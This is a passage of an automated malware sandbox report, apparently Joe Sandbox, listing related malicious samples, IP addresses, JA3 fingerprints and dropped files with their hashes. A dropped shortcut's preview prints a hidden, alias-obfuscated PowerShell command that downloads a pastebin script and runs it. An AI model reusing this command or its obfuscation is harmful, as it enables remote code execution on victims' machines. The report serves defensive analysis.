                                                                              https://ghgeacb.r.bh.d.sendibt3.com/tr/cl/9i6x1nV2FKKN7vq8mr3OOEBBJCa885_P6VOZmrd6IAYZGxQqgx9-g2thnbfEyM7jcWMQq10DSkzoGE3hrRIOhqWmDMPB-v-Vs_HL2v8poWMBuT3diKJIsJCPnKr9QKNE7_LQcdnWzzdGVm3zkkF8zFTuvWpKy9uYId6Fqvw2hXfQsOcPQhS-r0DxYjl5NQ8-Qb21PAbLEM_Rbhi2eb4YBhrAe2x12cQGxRcawRCOj3pfpwGLu7SYcJdrZL0t9GyigTigzg3YlzmaeYqZCQsLc2qAheh9wzUxvwGet hashmaliciousUnknownBrowse
                                                                              • 188.114.96.3
                                                                              CLOUDFLARENETUSgabe.ps1Get hashmaliciousUnknownBrowse
                                                                              • 104.20.4.235
                                                                              aidjBV.ps1Get hashmaliciousUnknownBrowse
                                                                              • 162.159.135.232
                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                              • 104.21.53.8
                                                                              cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                              • 162.159.138.232
                                                                              cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                                              • 162.159.136.232
                                                                              cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                              • 162.159.135.232
                                                                              cyCsE47YV3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              RemotePCViewer.exeGet hashmaliciousUnknownBrowse
                                                                              • 172.67.37.123
                                                                              https://ghgeacb.r.bh.d.sendibt3.com/tr/cl/9i6x1nV2FKKN7vq8mr3OOEBBJCa885_P6VOZmrd6IAYZGxQqgx9-g2thnbfEyM7jcWMQq10DSkzoGE3hrRIOhqWmDMPB-v-Vs_HL2v8poWMBuT3diKJIsJCPnKr9QKNE7_LQcdnWzzdGVm3zkkF8zFTuvWpKy9uYId6Fqvw2hXfQsOcPQhS-r0DxYjl5NQ8-Qb21PAbLEM_Rbhi2eb4YBhrAe2x12cQGxRcawRCOj3pfpwGLu7SYcJdrZL0t9GyigTigzg3YlzmaeYqZCQsLc2qAheh9wzUxvwGet hashmaliciousUnknownBrowse
                                                                              • 188.114.96.3

                                                                              JA3 Fingerprints

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              3b5074b1b5d032e5620f69f9f700ff0egabe.ps1Get hashmaliciousUnknownBrowse
                                                                              • 104.20.3.235
                                                                              • 162.159.138.232
                                                                              • 185.199.109.133
                                                                              aidjBV.ps1Get hashmaliciousUnknownBrowse
                                                                              • 104.20.3.235
                                                                              • 162.159.138.232
                                                                              • 185.199.109.133
                                                                              cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                              • 104.20.3.235
                                                                              • 162.159.138.232
                                                                              • 185.199.109.133
                                                                              cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                                              • 104.20.3.235
                                                                              • 162.159.138.232
                                                                              • 185.199.109.133
                                                                              cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                              • 104.20.3.235
                                                                              • 162.159.138.232
                                                                              • 185.199.109.133
                                                                              na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                              • 104.20.3.235
                                                                              • 162.159.138.232
                                                                              • 185.199.109.133
                                                                              cyCsE47YV3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 104.20.3.235
                                                                              • 162.159.138.232
                                                                              • 185.199.109.133
                                                                              z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                              • 104.20.3.235
                                                                              • 162.159.138.232
                                                                              • 185.199.109.133
                                                                              wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                              • 104.20.3.235
                                                                              • 162.159.138.232
                                                                              • 185.199.109.133
                                                                              3ckUhKW8W6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                              • 104.20.3.235
                                                                              • 162.159.138.232
                                                                              • 185.199.109.133

                                                                              Dropped Files

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exexK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                                                                C:\Users\user\AppData\Local\Temp\Backend.dllxK44OOt7vD.exeGet hashmaliciousUnknownBrowse

                                                                                  Created / dropped Files

                                                                                  C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Archive, ctime=Sat May 7 04:20:03 2022, mtime=Mon Sep 9 22:58:05 2024, atime=Sat May 7 04:20:03 2022, length=69632, window=hidenormalshowminimized
                                                                                  Category:dropped
                                                                                  Size (bytes):1728
                                                                                  Entropy (8bit):4.527272298423835
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:8MBsCCbRKrzcAJBkr+/4MsPsiqxlD2uxmCnBuG4aVlilzXQaR3+hab/Ia7/OB+/q:8zD6JUUPx2uxFu+LozXv3KabINBY0
                                                                                  MD5:724AA21828AD912CB466E3B0A79F478B
                                                                                  SHA1:41B80A72CE8C2F1F54C1E595872D7ECD63D637CD
                                                                                  SHA-256:D675147502CF2CA50BC4EC9A0D95DED0A5A8861BEC3D24FCD9EDD3F4B5718E70
                                                                                  SHA-512:B88218356ABF805B4263B0960DC6D0FBEC47E2135FA74839449CA860F727D54A1014062C9E7DB0652E81C635C8C0C177B47326DADAF3AE34ED058FA085F1E98C
                                                                                  Malicious:true
                                                                                  Preview:L..................F.... ...|%h..a.........|%h..a..........................E....P.O. .:i.....+00.../C:\...................V.1......Y..0.Windows.@......T,*)Y................................W.i.n.d.o.w.s.....Z.1.....$Yh...System32..B......T,*)Y......L_.....................!.S.y.s.t.e.m.3.2.....f.2......T.* .forfiles.exe..J......T.*)Y.....A...........t..........t..f.o.r.f.i.l.e.s...e.x.e.......V...............4.......U...........`8......Windows.C:\Windows\System32\forfiles.exe..&.....\.....\.....\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.f.o.r.f.i.l.e.s...e.x.e.../.p. .c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2. ./.m. .n.o.t.e.p.a.d...e.x.e. ./.c. .".p.o.w.e.r.s.h.e.l.l...e.x.e. .-.c.o.m.m.a.n.d. .p.o.w.e.r.s.h.e.l.l. .-.w.i.n.d.o.w.s.t.y.l.e. .h. .-.c.o.m.m.a.n.d. .'.s.a.l. .f.a.t.b.a.k.e. .c.a.l.c.;.s.a.l. .c.a.l.l.i.t. .i.E.x.;. .s.a.l. .$.e.n.v.:.o.s. .i.W.r.;. .c.a.l.l.i.T.(.W.I.N.D.O.W.S._.N.T. .p.a.s.t.e.b.i.n...c.o.m./.r.a.w./.s.A.0.4.M.w.k.2. .-.u.s.e.b.a.s.i.c.p.a.r.s.i.n.g.).'."..

                                                                                  C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):1310720
                                                                                  Entropy (8bit):0.7067022986836794
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vqn:2JIB/wUKUKQncEmYRTwh07
                                                                                  MD5:18E9D86CE6FBC4D5D2589CD7D5584584
                                                                                  SHA1:04B356C17E7C062C0C11C1F4616677F933FBD195
                                                                                  SHA-256:47E89C562DBD9A3DC809886C45FFE61234FA412AA151DFA270211C1395F34D75
                                                                                  SHA-512:E125B56F34629D90E18161D87EB7DD92B24E4041285703575308EA495838BAA42E1CCE42399A27737D3894479CFC9CB2517F9A2B23F37618973FB463A56A8426
                                                                                  Malicious:false
                                                                                  Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0xe0fbb24a, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                  Category:dropped
                                                                                  Size (bytes):1310720
                                                                                  Entropy (8bit):0.7900027763263399
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:bSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:bazaPvgurTd42UgSii
                                                                                  MD5:284F6EBE92B12F4DDD42E885932442EE
                                                                                  SHA1:5217A322509A111EDB8DA2926C3CBE287DE41046
                                                                                  SHA-256:466C0FF1F99FB76A1C9F7C98068CB851D4CA51E0631AA40D095A9A9D368AC5B9
                                                                                  SHA-512:071A61C8BE9BB17883DE6ED3C4C401B813275D46C5BF7B61577E331AFED4F26B9516E8B8D6C2AD8DAFD47DD6100C7B02EF5FCBB016288F6C75E879FA751A285E
                                                                                  Malicious:false
                                                                                  Preview:...J... ...............X\...;...{......................0.`.....42...{5......|..h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{..................................i^.......|...................E.B.....|...........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):16384
                                                                                  Entropy (8bit):0.08217889886404028
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:LIkYeeHUZqtD1t/57Dek3JV0Zqj/AllEqW3l/TjzzQ/t:zzmUUDHR3tV0C/Amd8/
                                                                                  MD5:8A0B2F596B402D13EE95117DF7281AF0
                                                                                  SHA1:DEFAF856E78A17C583C3238AE5B484B4EE056690
                                                                                  SHA-256:A677487115DA8836FA84A664A32AEDDE9D58F5AC5BC371AE0B4D717E63C7657D
                                                                                  SHA-512:57FD93D4AA9024CB740F6DA9823A416CAA8BC0FDA859D903521A6360F9515E0A415CA95B63FE721F119E16AD19A24C1E705AD607252DE900A4AB11734D894156
                                                                                  Malicious:false
                                                                                  Preview:.c.9.....................................;...{.......|..42...{5.........42...{5.42...{5...Y.42...{59.................E.B.....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):11608
                                                                                  Entropy (8bit):4.890472898059848
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                                  MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                                  SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                                  SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                                  SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                                  Malicious:false
                                                                                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):64
                                                                                  Entropy (8bit):1.1940658735648508
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Nlllul9p:NllU9
                                                                                  MD5:A9A0CCA1C30EF3D233EAD1A8B1C0C996
                                                                                  SHA1:862BE22EFDC58CDBD36D6FC520D0AADC2CA7F721
                                                                                  SHA-256:A38EFCDB0157A93B27DC080CD343ECC8464393A34C92600049AD3EA0F7EA34C2
                                                                                  SHA-512:6F2AE9D31A54F7812D289D4C855DFBE68A55950E5E75314A4BAAAB9D100101A14832CD1F04CEF612C0BA797AB7A783641E867CAA2BA1F221C170F81392BDC2CB
                                                                                  Malicious:false
                                                                                  Preview:@...e...............................R.3..............@..........

                                                                                  C:\Users\user\AppData\Local\Temp\Backend.dll

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):31744
                                                                                  Entropy (8bit):5.733195715654648
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:d+NjrSvLsSPa/1ZX3ohNQGDYOMg3P2SFZ2W1whvMDNGeSeu6dt3YXvu6:cpSvLQbOMgOSuQwRMRGe3deXvu6
                                                                                  MD5:228092BB00D909AEE1F694A26074CB57
                                                                                  SHA1:E409B75364693456006CADF61F2A5DDEF311ED0E
                                                                                  SHA-256:05FF6FB5A27E37AAB0269106830A0E1A56C709428AB130BBDDEFF737452E6FE3
                                                                                  SHA-512:3B714852BEB607C1EE394613E5974131CE7617C8E34E808F81DF4382ADC62CD61A81A0CFBA5019F9D40A8F38171A4E1FD75137529CEE4896FD10F55912E23E3C
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: xK44OOt7vD.exe, Detection: malicious, Browse
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Z.X..............F.....L.......L.......L.......L...................Y.....................*.............Rich............PE..d......a.........." .....J...4.......L..........Bi7.......................................`..........................................t..H....v.......................................d..T...........................Pe..8............`..0............................text...!H.......J.................. ..`.rdata.......`... ...N..............@..@.data................n..............@....pdata...............r..............@..@.rsrc................x..............@..@.reloc...............z..............@..B........................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\RESD0F0.tmp

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols, created Tue Oct 15 18:08:04 2024, 1st section name ".debug$S"
                                                                                  Category:modified
                                                                                  Size (bytes):1340
                                                                                  Entropy (8bit):4.0357826759451925
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:HeK9o0Uk/lpZHHwKOZmNeI+ycuZhN8akSIPNnqSed:c0HlpZwKOZmw1ul8a3wqS+
                                                                                  MD5:4ADBD2A8BD40228CAB9868D29D8B5457
                                                                                  SHA1:3FA0F0BA24B1211BC95BAEF5985ADEE957C51095
                                                                                  SHA-256:88811D705F6E2835884020725CD9EA2800563859757239A6E397AD07C3923244
                                                                                  SHA-512:42B949649CA0C5965B1A40717B9E0CEB269E407781233ABE7A12B2FC92F8D7380FCDC7562BF322EBE8FBD41701891597115DCA3F89CE0A2493626D9AD366FECA
                                                                                  Malicious:false
                                                                                  Preview:L......g.............debug$S........X...................@..B.rsrc$01........X.......<...........@..@.rsrc$02........P...F...............@..@........X....c:\Users\user\AppData\Local\Temp\dwdaoju2\CSC6D3B5E607DDC4941A0658A6CD27B5246.TMP...................v.[..................7.......C:\Users\user~1\AppData\Local\Temp\RESD0F0.tmp.-.<....................a..Microsoft (R) CVTRES.b.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.w.d.a.o.j.u.2...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....

                                                                                  C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):56320
                                                                                  Entropy (8bit):2.33688169239766
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:fcSG5Fnm1dQ1ej1YFmq/KFnp4H7OIcu7VYSEtuhjRTK6xZbkvwKwq6uiPmo/PmU:kvUdacFnp67ONu7xEW1XxeseU
                                                                                  MD5:BECD67D75C5E7C2411E9F481086CA1E0
                                                                                  SHA1:F7F5F1A3AFB7E3454797B2CAD62D298BB1B20345
                                                                                  SHA-256:E87B1FCB789B6957B5C99A1393738E928D3918F1E46DB20F761D57AD015AA385
                                                                                  SHA-512:D86DA68BA9BD3C992B33C99A3B96DFFEA3032E9B769A91A7FED33EC654E48A61A6E6715C630080D5D5E6390F4FC09B398111EAAAD60E3304B552DD0AC353B67E
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: xK44OOt7vD.exe, Detection: malicious, Browse
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."...0......T........... .....@..... ....................... ............`...@......@............... ...................................R........................................................................................... ..H............text........ ...................... ..`.rsrc....R.......T..................@..@........................................H........2...#......!....U...O............................................(....*6.(.....( ...*..(....*.(....*.(....,..(....*.{....r...po.....{....o....*.0..I........{....o........(.......(.....(Y(.......(.......(.....LY(.....{.....o....*z(....,..{....o.....{....o....*J.{....o.....(....*..{....r9..po....(.....{....o....*....0..F.......(......,<.{....o......3..{....rc..po....+..{....rq..po.....{....o....*...0..y.........s ...%%o!...j(....o".....o#...,J.r...p($...-..r...p($...-".r...p($

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eyqhqzsr.epu.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fgyrgpq4.r4l.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hzfvsgre.iwh.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j3yvnkqr.fyx.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ml00m1au.afz.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_njkgahzq.p3d.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_upqj4utt.wdr.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vvupmdv5.5kq.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wbcen20d.0uz.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wqazm4tv.zrs.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
